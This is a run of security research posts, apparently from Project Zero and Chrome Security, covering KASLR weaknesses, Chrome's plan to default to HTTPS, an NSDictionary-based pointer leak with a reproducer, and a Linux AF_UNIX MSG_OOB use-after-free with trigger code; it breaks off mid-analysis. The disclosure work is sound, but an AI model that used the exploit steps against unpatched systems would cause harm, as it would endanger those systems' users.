Three years ago, I wrote on the state of x86 KASLR and noted how “it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.” While it remains true that KASLR should not be trusted to prevent exploitation, particularly in local contexts, it is regrettable that the attitude around Linux KASLR is so fatalistic that putting in the engineering effort to preserve its remaining integrity is not considered to be worthwhile. The joint effect of these two issues dramatically simplified what might otherwise have been a more complicated and likely less reliable exploit. While side-channel attacks do impact the long-term viability of KASLR on all architectures, it is notable that Project Zero and the Google Threat Intelligence Group have yet to see a hardware side-channel attack for bypassing KASLR on Android in the wild. Additionally, KASLR still plays an important role in mitigating any remote kernel exploitation attempts. It is valuable from a defense-in-depth perspective to recognize the impact KASLR has on exploit complexity and reliability in real-world scenarios. In the future, we hope to see changes to the Linux kernel linear mapping and memory hot-plugging implementation to make this a less inviting target for attackers. Randomizing the location of the linear map in the virtual address space, increasing the entropy in physical page allocation, and randomizing the location of the kernel in the physical address space are all concrete steps that can be taken that would improve the overall security posture of Android, the Linux kernel, and Pixel.
One year from now, with the release of Chrome 154 in October 2026, we will change the default settings of Chrome to enable “Always Use Secure Connections”. This means Chrome will ask for the user's permission before the first access to any public site without HTTPS.
The “Always Use Secure Connections” setting warns users before accessing a site without HTTPS
Chrome Security's mission is to make it safe to click on links. Part of being safe means ensuring that when a user types a URL or clicks on a link, the browser ends up where the user intended. When links don't use HTTPS, an attacker can hijack the navigation and force Chrome users to load arbitrary, attacker-controlled resources, and expose the user to malware, targeted exploitation, or social engineering attacks. Attacks like this are not hypothetical—software to hijack navigations is readily available and attackers have previously used insecure HTTP to compromise user devices in a targeted attack.
Since attackers only need a single insecure navigation, they don't need to worry that many sites have adopted HTTPS—any single HTTP navigation may offer a foothold. What's worse, many plaintext HTTP connections today are entirely invisible to users, as HTTP sites may immediately redirect to HTTPS sites. That gives users no opportunity to see Chrome's "Not Secure" URL bar warnings until after the risk has occurred, and no opportunity to keep themselves safe in the first place.
To address this risk, we launched the “Always Use Secure Connections” setting in 2022 as an opt-in option. In this mode, Chrome attempts every connection over HTTPS, and shows a bypassable warning to the user if HTTPS is unavailable. We also previously discussed our intent to move towards HTTPS by default. We now think the time has come to enable “Always Use Secure Connections” for all users by default.
Now is the time.
For more than a decade, Google has published the HTTPS transparency report, which tracks the percentage of navigations in Chrome that use HTTPS. For the first several years of the report, numbers saw an impressive climb, starting at around 30-45% in 2015, and ending up around the 95-99% range around 2020. Since then, progress has largely plateaued.
HTTPS adoption expressed as a percentage of main frame page loads
This rise represents a tremendous improvement to the security of the web, and demonstrates that HTTPS is now mature and widespread. This level of adoption is what makes it possible to consider stronger mitigations against the remaining insecure HTTP.
Balancing user safety with friction
While it may at first seem that 95% HTTPS means that the problem is mostly solved, the truth is that a few percentage points of HTTP navigations is still a lot of navigations. Since HTTP navigations remain a regular occurrence for most Chrome users, a naive approach to warning on all HTTP navigations would be quite disruptive. At the same time, as the plateau demonstrates, doing nothing would allow this risk to persist indefinitely. To balance these risks, we have taken steps to ensure that we can help the web move towards safer defaults, while limiting the potential annoyance warnings will cause to users.
One way we're balancing risks to users is by making sure Chrome does not warn about the same sites excessively. In all variants of the "Always Use Secure Connections" settings, so long as the user regularly visits an insecure site, Chrome will not warn the user about that site repeatedly. This means that rather than warn users about 1 out of 50 navigations, Chrome will only warn users when they visit a new (or not recently visited) site without using HTTPS.
To further address the issue, it's important to understand what sort of traffic is still using HTTP. The largest contributor to insecure HTTP by far, and the largest contributor to variation across platforms, is insecure navigations to private sites. The graph above includes both navigations to public sites, such as example.com, and navigations to private sites, such as local IP addresses like 192.168.0.1, single-label hostnames, and shortlinks like intranet/. While it is free and easy to get an HTTPS certificate that is trusted by Chrome for a public site, acquiring an HTTPS certificate for a private site unfortunately remains complicated. This is because private names are "non-unique"—private names can refer to different hosts on different networks. There is no single owner of 192.168.0.1 for a certification authority to validate and issue a certificate to.
HTTP navigations to private sites can still be risky, but are typically less dangerous than their public site counterparts because there are fewer ways for an attacker to take advantage of these HTTP navigations. HTTP on private sites can only be abused by an attacker also on your local network, like on your home wifi or in a corporate network.
If you exclude navigations to private sites, then the distribution becomes much tighter across platforms. In particular, Linux jumps from 84% HTTPS to nearly 97% HTTPS when limiting the analysis to public sites only. Windows increases from 95% to 98% HTTPS, and both Android and Mac increase to over 99% HTTPS.
In recognition of the reduced risk HTTP to private sites represents, last year we introduced a variant of “Always Use Secure Connections” for public sites only. For users who frequently access private sites (such as those in enterprise settings, or web developers), excluding warnings on private sites significantly reduces the volume of warnings those users will see. Simultaneously, for users who do not access private sites frequently, this mode introduces only a small reduction in protection. This is the variant we intend to enable for all users next year.
“Always Use Secure Connections,” available at chrome://settings/security
In Chrome 141, we experimented with enabling “Always Use Secure Connections” for public sites by default for a small percentage of users. We wanted to validate our expectations that this setting keeps users safer without burdening them with excessive warnings.
Analyzing the data from the experiment, we confirmed that the number of warnings seen by users is considerably lower than 3% of navigations—in fact, the median user sees fewer than one warning per week, and the ninety-fifth percentile user sees fewer than three warnings per week.
Understanding HTTP usage
Once “Always Use Secure Connections” is the default and additional sites migrate away from HTTP, we expect the actual warning volume to be even lower than it is now. In parallel to our experiments, we have reached out to a number of companies responsible for the most HTTP navigations, and expect that they will be able to migrate away from HTTP before the change in Chrome 154. For many of these organizations, transitioning to HTTPS isn't disproportionately hard, but simply has not received attention. For example, many of these sites use HTTP only for navigations that immediately redirect to HTTPS sites—an insecure interaction which was previously completely invisible to users.
Another current use case for HTTP is to avoid mixed content blocking when accessing devices on the local network. Private addresses, as discussed above, often do not have trusted HTTPS certificates, due to the difficulties of validating ownership of a non-unique name. This means most local network traffic is over HTTP, and cannot be initiated from an HTTPS page—the HTTP traffic counts as insecure mixed content, and is blocked. One common use case for needing to access the local network is to configure a local network device, e.g. the manufacturer might host a configuration portal at config.example.com, which then sends requests to a local device to configure it.
Previously, these types of pages needed to be hosted without HTTPS to avoid mixed content blocking. However, we recently introduced a local network access permission, which both prevents sites from accessing the user’s local network without consent and allows an HTTPS site to bypass mixed content checks for the local network once the permission has been granted. This can unblock migrating these domains to HTTPS.
Changes in Chrome
We will enable the "Always Use Secure Connections" setting in its public-sites variant by default in October 2026, with the release of Chrome 154. Prior to enabling it by default for all users, in Chrome 147, releasing in April 2026, we will enable "Always Use Secure Connections" in its public-sites variant for the over 1 billion users who have opted in to Enhanced Safe Browsing protections in Chrome.
While it is our hope and expectation that this transition will be relatively painless for most users, users will still be able to disable the warnings by disabling the "Always Use Secure Connections" setting.
If you are a website developer or IT professional, and you have users who may be impacted by this feature, we very strongly recommend enabling the "Always Use Secure Connections" setting today to help identify sites that you may need to work to migrate. IT professionals may find it useful to read our additional resources to better understand the circumstances where warnings will be shown, how to mitigate them, and how organizations that manage Chrome clients (like enterprises or educational institutions) can ensure that Chrome shows the right warnings to meet those organizations' needs.
Looking Forward
While we believe that warning on insecure public sites represents a significant step forward for the security of the web, there is still more work to be done. In the future, we hope to work to further reduce barriers to adoption of HTTPS, especially for local network sites. This work will hopefully enable even more robust HTTP protections down the road.
Posted by Chris Thompson, Mustafa Emre Acer, Serena Chen, Joe DeBlasio, Emily Stark and David Adrian, Chrome Security Team
Some time in 2024, during a Project Zero team discussion, we were talking about how remote ASLR leaks would be helpful or necessary for exploiting some types of memory corruption bugs, specifically in the context of Apple devices. Coming from the angle of "where would be a good first place to look for a remote ASLR leak", this led to the discovery of a trick that could potentially be used to leak a pointer remotely, without any memory safety violations or timing attacks, in scenarios where an attack surface can be reached that deserializes attacker-provided data, re-serializes the resulting objects, and sends the re-serialized data back to the attacker.
The team brainstormed, and we couldn't immediately come up with any specific attack surface on macOS/iOS that would behave this way, though we did not perform extensive analysis to test whether such attack surface exists. Instead of targeting a real attack surface, I tested the technique described here on macOS with an artificial test case that uses NSKeyedArchiver serialization as the target. Because of the lack of demonstrated real-world impact, I reported the issue to Apple without filing it in our bugtracker. It was fixed in the 31 Mar 2025 security releases. Links to Apple code in this post go to an outdated version of the code that hasn't been updated in years, and descriptions of how the code works refer to the old unfixed version.
I decided to write about the technique since it is kind of intriguing and novel, and some of the ideas in it might generalize to other contexts. It is closely related to a partial pointer leak and another pointer ordering leak that I discovered in the past, and shows how pointer-keyed data structures can be used to leak addresses under ideal circumstances.
Background - the tech tree
hashDoS
To me, the story of this issue begins in 2011, when the hashDoS attack was presented at 28C3 (slides, recording). In essence, hashDoS is a denial-of-service attack on services (in particular web servers) that populate hash tables with lots of attacker-controlled keys (like POST parameters). It is based on the observation that many hash table implementations have O(1) complexity per insert/lookup operation in the average case, but O(n) complexity for the same operations in the worst case (where the hashes of all keys land in the same hash bucket, and the hash table essentially turns into something like a linked list or an unsorted array depending on how it is implemented). In particular if the hash function used for keys is known to the attacker, then by constructing a request full of parameters whose keys all map to the same hash bucket, an attacker can cause the server to spend O(n²) time processing such a request; this turned out to be enough to keep a web server's CPU saturated using ridiculously small amounts of network traffic.
This class of attack was already described back in 1998 by Solar Designer, in a discussion of port scan detection that anticipated the core idea:
When choosing a sorting or data lookup algorithm to be used for a normal application, people are usually optimizing the typical case. However, for IDS [intrusion detection systems] the worst case scenario should always be considered: an attacker can supply our IDS with whatever data she likes. If the IDS is fail-open, she would then be able to bypass it, and if it's fail-close, she could cause a DoS for the entire protected system.
Let me illustrate this by an example. In scanlogd, I'm using a hash table to lookup source addresses. This works very well for the typical case as long as the hash table is large enough (since the number of addresses we keep is limited anyway). The average lookup time is better than that of a binary search. However, an attacker can choose her addresses (most likely spoofed) to cause hash collisions, effectively replacing the hash table lookup with a linear search. Depending on how many entries we keep, this might make scanlogd not be able to pick new packets up in time. This will also always take more CPU time from other processes in a host-based IDS like scanlogd.
[...]
It is probably worth mentioning that similar issues also apply to things like operating system kernels. For example, hash tables are widely used there for looking up active connections, listening ports, etc. There're usually other limits which make these not really dangerous though, but more research might be needed.
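The degenerate case can be sketched with a toy chained hash table whose deliberately weak, attacker-known hash function makes collisions trivial to construct (everything here is illustrative; the names and constants are invented, not any real server's implementation):

```python
def weak_hash(key):
    # Attacker-known hash with no secret seed: only the low 10 bits
    # of the key matter, so collisions are trivial to construct.
    return key & 0x3FF

class ToyTable:
    def __init__(self, nbuckets=1024):
        self.buckets = [[] for _ in range(nbuckets)]
        self.comparisons = 0

    def insert(self, key, value):
        chain = self.buckets[weak_hash(key) % len(self.buckets)]
        for i, (k, _) in enumerate(chain):   # linear scan of the chain
            self.comparisons += 1
            if k == key:
                chain[i] = (key, value)
                return
        chain.append((key, value))

t = ToyTable()
for k in range(0, 1024 * 500, 1024):   # 500 keys, all land in bucket 0
    t.insert(k, None)
print(t.comparisons)                   # ~n^2/2 = 124750 comparisons
```

With n colliding keys, each insert scans the whole chain built so far, so total work grows quadratically – the O(n²) behavior that lets a small request saturate a CPU.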
hashDoS as a timing attack
From a slightly different perspective, the central observation of hashDoS is: If an attacker can insert a large number of chosen keys into a hash table (or hash set) and knows which hash buckets these keys hash to, then the attacker can (depending on hash table implementation details) essentially slow down future accesses to a chosen hash bucket.
This becomes interesting if the attacker can cause the insertion of other keys whose hashes are secret into the same hash table. In practice, this can for example happen with hash tables which support mixing multiple key types together, like JavaScript's Map. Back in 2016, in the Firefox implementation, int32 numbers were hashed with a fixed hash function ScrambleHashCode(number), while strings were atomized/interned and then hashed based on their virtual address. That made it possible to first fill an attacker-chosen hash table bucket with lots of elements, then insert a string, observe whether its insertion is fast or slow, and determine from that whether the string's hash matches the attacker-chosen hash bucket.
With some tricks relying on a pattern in the addresses of interned single-character strings in Firefox, that made it possible to leak the lower 32 bits of a heap address through Map insertions and timing measurements. For more details, see the original writeup and bug report. Of course, nowadays that kind of timing-based in-process partial pointer leak from JavaScript would be considered less interesting, since it is generally assumed that JavaScript can read all memory in the same process anyway...
A takeaway from this is: When pointers are used as the basis for object hash codes, this can leak pointers through side channels in keyed data structures.
Linux: object ordering leak through in-order listing of a pointer-keyed tree
As I noted in a blog post a few years ago, on Linux, it is possible for unprivileged userspace to discover in what order struct file instances are stored in kernel virtual memory by reading from /proc/self/fdinfo/<epoll fd> - this file lists all files that are watched by an epoll instance by iterating through a red-black tree that is (essentially) sorted by the virtual address of the referenced struct file, so the data given to userspace is sorted in the same way.
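This ordering can be observed directly on a Linux system (a small sketch; it assumes a Linux kernel with epoll and procfs, and the ordering of the "tfd:" lines reflects kernel struct file addresses, not registration order):

```python
import select
import socket

# Register several sockets with an epoll instance, then read the
# epoll fd's fdinfo: the kernel walks its red-black tree (keyed
# essentially by struct file address) in order, so the "tfd:" lines
# come out sorted by kernel pointer, not by registration order.
ep = select.epoll()
socks = [socket.socket() for _ in range(4)]
for s in socks:
    ep.register(s.fileno(), select.EPOLLIN)

with open("/proc/self/fdinfo/%d" % ep.fileno()) as f:
    fdinfo = f.read()
print(fdinfo)
```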
(As I noted in that post, this could be particularly interesting for breaking probabilistic memory safety mitigations that rely on pointer tagging. If the highest bits of pointers are secret tag bits, and an attacker can determine the order of the addresses (including tag bits) of objects, the attacker can infer whether an object's tag changed after reallocation.)
A takeaway from this is: Keyed data structures don't just leak information about object hash codes through timing; iterating over a keyed data structure can also generate data whose ordering reveals information about object hash codes.
Serialization attacks
There are various approaches to serializing an object graph. On one side of the spectrum is schema-based serialization, where ideally:
serializable types with their members are declared separately from other types
fields explicitly declare which other types they can point to (there are no generic pointers that can point to anything)
deserialization starts from a specific starting type
On the other side of the serialization spectrum are things like classic Java serialization (without serialization filters), where essentially any class marked as Serializable can be deserialized, serialized fields can often flexibly point to lots of different types, and therefore serialized data can also have a lot of control over the shape of the resulting object graph. There is a lot of public research on the topic of "serialization gadget chains" in Java, where objects can be combined such that deserializing them results in things like remote code execution. This type of serialization is generally considered to be unsafe for use across security boundaries, though Android exposes it across local security boundaries.
Somewhere in the middle of this spectrum is serialization that is fundamentally built like unsafe deserialization, but adds some coarse filters that only allow deserialized objects to have types from an allowlist to make it safe. In Java, that is called "serialization filtering". This is also approximately the behavior of Apple's NSKeyedUnarchiver.unarchivedObjectOfClasses, which this post focuses on.
An artificial test case
The goal of the technique described in this post is to leak a pointer to the "shared cache" (a large mapping which is at the same virtual address across all processes on the system, whose address only changes on reboot) through a single execution of the following test case, which uses NSKeyedUnarchiver.unarchivedObjectOfClasses to deserialize an attacker-supplied object graph consisting of the types NSDictionary, NSNumber, NSArray and NSNull, re-serializes the result, and writes back the resulting serialized data:
(The test case also allows NSString but I think that was irrelevant.)
Building blocks
The NSNull / CFNull singleton
The CFNull type is special: There is only one singleton instance of it, kCFNull, implemented in CFBase.c, which is stored in the shared cache. When you deserialize an NSNull object, this doesn't actually create a new object - instead, the singleton is used.
In the CFRuntimeClass for CFNull, __CFNullClass, no hash handler is provided. When CFHash is called on an object with a type like __CFNullClass that does not implement a ->hash handler, the address of the object is used as the hash code.
Pointer-based hashing is not specific to NSNull; but there probably aren't many other types for which deserialization uses singletons in the shared cache. There are probably way more types for which instances' hashes are heap addresses.
NSNumber
The NSNumber type encapsulates a number and supports several types of numbers; its hash handler __CFNumberHash hashes 32-bit integers with _CFHashInt, which pretty much just performs a multiplication with some big prime number.
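A rough model of what this means for the attacker (the HASHFACTOR constant and the shape of _CFHashInt are assumptions based on old CoreFoundation sources; treat the details as illustrative):

```python
HASHFACTOR = 2654435761  # large prime near 2^32/phi; assumed constant

def cf_hash_int(i: int) -> int:
    # Rough model of _CFHashInt: |i| multiplied by HASHFACTOR,
    # truncated to the 64-bit CFHashCode width.
    return (abs(i) * HASHFACTOR) % (1 << 64)

def keys_for_bucket(bucket: int, num_buckets: int, count: int) -> list:
    """Find integer NSNumber values whose hash lands in a chosen bucket."""
    found, n = [], 1
    while len(found) < count:
        if cf_hash_int(n) % num_buckets == bucket:
            found.append(n)
        n += 1
    return found

print(keys_for_bucket(0, 7, 4))
```

Because the hash is a fixed, public function, picking NSNumber keys that land in any desired bucket is just a matter of enumeration.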
NSDictionary
Instances of the NSDictionary type are immutable hash tables and can contain arbitrarily-typed keys. Key hashes are mapped to hash table buckets using a simple modulo operation: hash_code % num_buckets. The number of hash buckets in an NSDictionary is always a prime number (see __CFBasicHashTableSizes); hash table sizes are chosen based on __CFBasicHashTableCapacities such that hash tables are normally roughly half-full (around 38%-62%), though the sizing is a bit different for small sizes. These are probing-style hash tables: rather than having a linked list off each hash bucket, collisions are handled by finding alternate buckets to store colliding elements in using the policy __kCFBasicHashLinearHashingValue / FIND_BUCKET_HASH_STYLE == 1, under which insertion scans forward through the hash table buckets.
I haven't found source code for serialization of NSDictionary, but it appears to happen in the obvious way, by iterating through the hash buckets in order.
The attack
The basic idea: Infoleak through key ordering in serialized NSDictionary
If a targeted process fills an NSDictionary with attacker-chosen NSNumber keys (through deserialization), the attacker can control which hash buckets will be used by using numbers for which the number's hash modulo the hash table size results in the desired bucket index. If the targeted process then inserts an NSNull key (still as part of the same deserialization), and then serializes the resulting NSDictionary, the location of the NSNull key in the dictionary's serialized keys will reveal information about the hash of NSNull.
In particular, the attacker can create a pattern like this using NSNumber keys (where # is a bucket occupied by an NSNumber, and _ is a bucket left empty), where even-numbered buckets are occupied and odd-numbered buckets are empty, here with the example of a hash table of size 7:
bucket index:    0123456
bucket contents: #_#_#_#
This leaves three spots where the NSNull could be inserted (marked with !):
At index 1 (#!#_#_#). This happens if hash_code % num_buckets is 6, 0, or 1. (For 6 and 0, insertion would scan linearly through the buckets until finding the free bucket at index 1.) This would result in NSNull being second in the serialized data.
At index 3 (#_#!#_#). This happens if hash_code % num_buckets is 2 or 3. This would result in NSNull being third in the serialized data.
At index 5 (#_#_#!#). This happens if hash_code % num_buckets is 4 or 5. This would result in NSNull being fourth in the serialized data.
If the serialized data is then sent back to the attacker, the attacker can distinguish between these three states (based on the index of the NSNull key in the serialized data), and learn in which range hash_code % num_buckets is.
Extending it: Leaking the entire bucket index
If the attack from the last section is repeated with the following pattern (occupying odd-numbered buckets and leaving even-numbered ones empty), this yields more information about hash_code % num_buckets:
bucket index:    0123456
bucket contents: _#_#_#_
(Caveat: Don't think too hard about how a hash table with 3 elements would use only 3 buckets and therefore wouldn't look like this. The actual reproducer uses hash tables with >=23 buckets.)
Now we have four spots where the NSNull could be inserted:
At index 0, if hash_code % num_buckets is 0.
At index 2, if hash_code % num_buckets is 1 or 2.
At index 4, if hash_code % num_buckets is 3 or 4.
At index 6, if hash_code % num_buckets is 5 or 6.
By combining the information from an NSDictionary that uses the even-buckets-occupied pattern and an NSDictionary that uses the odd-buckets-occupied pattern, the exact value of hash_code % num_buckets can be determined; for example, if the first pattern results in #_#!#_# and the second pattern results in _#!#_#_, then hash_code % num_buckets is 2.
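This two-pattern trick can be checked with a toy model of the probing hash table (a deliberately simplified sketch that models only bucket selection and forward scanning, not real CFBasicHash internals):

```python
def insert(buckets, hash_code):
    # linear-probing insertion: start at hash_code % size, scan forward
    n = len(buckets)
    i = hash_code % n
    while buckets[i] is not None:
        i = (i + 1) % n
    buckets[i] = hash_code
    return i

def null_position(num_buckets, null_residue, occupy_even):
    # fill every second bucket with attacker-chosen keys, then insert the
    # NSNull key; return its position in serialization (bucket) order
    buckets = [None] * num_buckets
    for b in range(0 if occupy_even else 1, num_buckets, 2):
        insert(buckets, b)
    slot = insert(buckets, null_residue)
    return sum(1 for b in buckets[:slot] if b is not None)

def recover_residue(num_buckets, pos_even, pos_odd):
    # the pair of serialized positions uniquely identifies hash % num_buckets
    for r in range(num_buckets):
        if (null_position(num_buckets, r, True),
            null_position(num_buckets, r, False)) == (pos_even, pos_odd):
            return r
```

For the size-7 example, a hash with residue 2 lands in bucket 3 under the even pattern (third in serialization order) and in bucket 2 under the odd pattern (second), which together pin the residue down to exactly 2.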
So by sending a serialized NSArray containing two NSDictionary instances with these patterns of NSNumber and NSNull keys to some targeted process, and then receiving a re-serialized copy from the victim, an attacker can determine hash_code % num_buckets, where hash_code is the hash (and therefore the address) of the NSNull singleton.
Some math: Leaking the entire hash_code
To leak even more information about the hash_code, this can be repeated with different hash table sizes. The attack from the last section leaks hash_code % num_buckets, where num_buckets is a prime number that the attacker can pick from the possible sizes __CFBasicHashTableSizes based on how many elements are in each NSDictionary.
A useful math trick here is the Chinese Remainder Theorem: given the values of hash_code modulo a bunch of different prime numbers, hash_code modulo the product of all those primes can be calculated (with modular inverses computed using the extended Euclidean algorithm). Therefore, knowing hash_code % num_buckets for the hash table sizes 23, 41, 71, 127, 191, 251, 383, 631 and 1087 makes it possible to determine hash_code modulo 23*41*71*127*191*251*383*631*1087 = 0x5'ce23'017b'3bd5'1495. Because 0x5'ce23'017b'3bd5'1495 is bigger than the biggest value hash_code can have (since hash_code is 64-bit), that will be the actual value of hash_code: the address of the NSNull singleton.
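A sketch of that reconstruction in Python (standard Chinese-Remainder-Theorem arithmetic; the address value below is just an example):

```python
from math import prod

PRIMES = [23, 41, 71, 127, 191, 251, 383, 631, 1087]

def crt(residues, moduli):
    # combine hash_code % m for pairwise-coprime moduli into
    # hash_code % prod(moduli), using modular inverses (extended Euclid)
    M = prod(moduli)
    x = 0
    for r, m in zip(residues, moduli):
        Mi = M // m
        x += r * Mi * pow(Mi, -1, m)  # pow(a, -1, m): inverse mod m (3.8+)
    return x % M

addr = 0x1EB91AB60                     # example NSNull singleton address
residues = [addr % p for p in PRIMES]  # what the bucket-position leaks give us
M = prod(PRIMES)
assert M == 0x5CE23017B3BD51495        # > 2**64, so the residue IS the address
assert crt(residues, PRIMES) == addr
```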
Putting it together
So to leak the address of the NSNull singleton in the shared cache, an attacker has to send serialized data consisting of one large container (such as an NSArray) that, for each prime number of interest, contains two NSDictionary instances with the even-indices and odd-indices patterns. (The NSNull keys should come last in the attacker-provided serialized NSDictionary instances, so my reproducer constructs the serialized data manually as an XML plist, and I then convert it to a binary plist with plutil.)
This attacker-provided serialized data is about 50 KiB in size.
The targeted process then has to deserialize this data, serialize it again, and send it back to the attacker.
Afterwards, the attacker can determine in which buckets NSNull was stored in each NSDictionary, use the bucket indices from pairs of NSDictionary to determine hash_code % num_buckets for each hash table size, and then use the extended Euclidean algorithm to obtain hash_code, the address of the NSNull singleton.
The reproducer
I wrote a reproducer for this issue, consisting of my own victim program that runs on the target machine and attacker programs that provide serialized data to the target machine and receive re-serialized data from the target. (For easy reproduction, you can test this on a single machine, which is also what I did; though I rebooted between the "attacker" and "target" steps to make sure the attacker isn't using the same shared cache address as the target.)
First, on the attacker machine, generate serialized data:
Then, on the attacker machine, process the re-serialized data:
% plutil -convert xml1 reencoded.plist
% clang -o extract-pointer extract-pointer.c
% ./extract-pointer < reencoded.plist
serialized data with 1111 objects
NSNull class is 12, NSNull object is 11
NSNull is elem 8 out of 13
NSNull is elem 7 out of 12
NSNull is elem 7 out of 22
NSNull is elem 7 out of 21
NSNull is elem 6 out of 37
NSNull is elem 5 out of 36
NSNull is elem 61 out of 65
NSNull is elem 60 out of 64
NSNull is elem 32 out of 97
NSNull is elem 31 out of 96
NSNull is elem 95 out of 127
NSNull is elem 95 out of 126
NSNull is elem 175 out of 193
NSNull is elem 175 out of 192
NSNull is elem 188 out of 317
NSNull is elem 188 out of 316
NSNull is elem 214 out of 545
NSNull is elem 214 out of 544
NSNull mod 23 = 14
NSNull mod 41 = 13
NSNull mod 71 = 10
NSNull mod 127 = 120
NSNull mod 191 = 62
NSNull mod 251 = 189
NSNull mod 383 = 349
NSNull mod 631 = 375
NSNull mod 1087 = 427
NSNull mod 0x000000000000000000000000000003af = 0x0000000000000000000000000000017e
NSNull mod 0x00000000000000000000000000010589 = 0x000000000000000000000000000059e6
NSNull mod 0x0000000000000000000000000081bef7 = 0xfffffffffffffffffffffffffff4177a
NSNull mod 0x00000000000000000000000060cd7a49 = 0x000000000000000000000000078e47f3
NSNull mod 0x00000000000000000000005ee976e593 = 0x000000000000000000000001eb91ab60
NSNull mod 0x000000000000000000008dff48e176ed = 0x000000000000000000000001eb91ab60
NSNull mod 0x0000000000000000015e003ca3bc222b = 0x000000000000000000000001eb91ab60
NSNull mod 0x0000000000000005ce23017b3bd51495 = 0x000000000000000000000001eb91ab60
NSNull = 0x1eb91ab60
Conclusion
This is a fairly theoretical attack; but I think it demonstrates that using pointers as object hashes for keyed data structures can lead to pointer leaks if everything lines up right, even without using timing attacks.
My example relies on the victim re-serializing the data; but a timing attack version of this might be possible too, with significantly more requests and sufficiently precise measurements.
In my testcase, NSDictionary made it possible to essentially leak information about the ordering of pointers and hashes of numbers by mixing keys of different types; but it is probably possible to leak some amount of information even from data structures that only use pointer keys without mixing key types, especially when the attacker can guess roughly how far apart heap objects are allocated and/or can reference the same objects repeatedly across multiple containers.
The most robust mitigation against this is to avoid using object addresses as lookup keys, or alternatively hash them with a keyed hash function (which should reduce the potential address leak to a pointer equality oracle). However, that could come with negative performance effects - in particular, using an ID stored inside an object instead of the object's address could add a memory load to the critical path of lookups.
In early June, I was reviewing a new Linux kernel feature when I learned about the MSG_OOB feature supported by stream-oriented UNIX domain sockets. I reviewed the implementation of MSG_OOB, and discovered a security bug (CVE-2025-38236) affecting Linux >=6.9. I reported the bug to Linux, and it got fixed. Interestingly, while the MSG_OOB feature is not used by Chrome, it was exposed in the Chrome renderer sandbox. (Since then, sending MSG_OOB messages has been blocked in Chrome renderers in response to this issue.)
The bug is pretty easy to trigger; the following sequence results in UAF:
char dummy;
int socks[2];
socketpair(AF_UNIX, SOCK_STREAM, 0, socks);
send(socks[1], "A", 1, MSG_OOB);
recv(socks[0], &dummy, 1, MSG_OOB);
send(socks[1], "A", 1, MSG_OOB);
recv(socks[0], &dummy, 1, MSG_OOB);
send(socks[1], "A", 1, MSG_OOB);
recv(socks[0], &dummy, 1, 0);
recv(socks[0], &dummy, 1, MSG_OOB);
I was curious to explore how hard it is to actually exploit such a bug from inside the Chrome Linux Desktop renderer sandbox on an x86-64 Debian Trixie system, escalating privileges directly from native code execution in the renderer to the kernel. Even if the bug is reachable, how hard is it to find useful primitives for heap object reallocation, delay injection, and so on?
The exploit code is posted on our bugtracker; you may want to reference it while following along with this post.
Backstory: The feature
Support for using MSG_OOB with AF_UNIX stream sockets was added in 2021 with commit 314001f0bf92 ("af_unix: Add OOB support", landed in Linux 5.15). With this feature, it is possible to send a single byte of "out-of-band" data that the recipient can read ahead of the rest of the data. The feature is very limited - out-of-band data is always a single byte, and there can only be a single pending byte of out-of-band data at a time. (Sending two out-of-band messages one after another causes the first one to be turned into a normal in-band message.) This feature is used almost nowhere except in Oracle products, as discussed on an email thread from 2024 where removal of the feature was proposed; yet it is enabled by default when AF_UNIX socket support is enabled in the kernel config, and it wasn't even possible to disable MSG_OOB support until commit 5155cbcdbf03 ("af_unix: Add a prompt to CONFIG_AF_UNIX_OOB") landed in December 2024.
Because the Chrome renderer sandbox allows stream-oriented UNIX domain sockets and didn't filter the flags arguments of send()/recv() functions, this esoteric feature was usable inside the sandbox.
When a message (represented by a socket buffer / struct sk_buff, short SKB) is sent between two connected stream-oriented sockets, the message is added to the ->sk_receive_queue of the receiving socket, which is a linked list. An SKB has a length field ->len describing the length of data contained within it (counting both data in the SKB's "head buffer" as well as data indirectly referenced by the SKB in other ways). An SKB also contains some scratch space that can be used by the subsystem currently owning the SKB (char cb[48] in struct sk_buff); UNIX domain sockets access this scratch space with the helper #define UNIXCB(skb) (*(struct unix_skb_parms *)&((skb)->cb)), and one of the things they store in there is a field u32 consumed which stores the number of bytes of the SKB that have already been read from the socket. UNIX domain sockets count the remaining length of an SKB with the helper unix_skb_len(), which returns skb->len - UNIXCB(skb).consumed.
MSG_OOB messages (sent with something like send(sockfd, &message_byte, 1, MSG_OOB), which goes through queue_oob() in the kernel) are also added to the ->sk_receive_queue just like normal messages; but to allow the receiving socket to access the latest out-of-band message ahead of the rest of the queue, the ->oob_skb pointer of the receiving socket is updated to point to this message. When the receiving socket receives an OOB message with something like recv(sockfd, &received_byte, 1, MSG_OOB) (implemented in unix_stream_recv_urg()), the corresponding socket buffer stays on the ->sk_receive_queue, but its consumed field is incremented, causing its remaining length (unix_skb_len()) to become 0, and the ->oob_skb pointer is cleared; the normal receive path will have to deal with this when encountering the remaining-length-0 SKB.
This means that the normal recv() path (unix_stream_read_generic()), which runs when recv() is called without MSG_OOB, must be able to deal with remaining-length-0 SKBs and must take care to clear the ->oob_skb pointer when it deletes an OOB SKB. manage_oob() is supposed to take care of this. Essentially, when the normal receive path obtains an SKB from the ->sk_receive_queue, it calls manage_oob() to take care of all the fixing-up required to deal with the OOB mechanism; manage_oob() will then return the first SKB that contains at least 1 byte of remaining data, and manage_oob() ensures that this SKB is no longer referenced as ->oob_skb. unix_stream_read_generic() can then proceed as if the OOB mechanism didn't exist.
Backstory: The bug, and what led to it
In mid-2024, a userspace API inconsistency was discovered, where recv() could spuriously return 0 (which normally signals end-of-file) when trying to read from a socket with a receive queue that contains a remaining-length-0 SKB left behind by receiving an OOB SKB. The fix for this issue introduced two closely related security issues that can lead to UAF; it was marked as fixing a bug introduced by the original MSG_OOB implementation, but luckily was actually only backported to Linux 6.9.8, so the buggy fix did not land in older LTS kernel branches.
After the buggy fix, manage_oob() looked as follows:
In other words, the issue is that when the receive queue looks like this (shown with the oldest message at the top):
SKB 1: unix_skb_len()=0
SKB 2: unix_skb_len()=1 <--OOB pointer
and a normal recv() happens, then manage_oob() takes the !unix_skb_len(skb) branch, which deletes the SKB with remaining length 0 and skips forward to the following SKB; but it then doesn't go through the skb == u->oob_skb check as it otherwise would, which means it doesn't clear out the ->oob_skb pointer before the SKB is consumed by the normal receive path, creating a dangling pointer that will lead to UAF on a subsequent recv(... MSG_OOB).
This issue was fixed, making the checks for remaining-length-0 SKBs and ->oob_skb in manage_oob() independent:
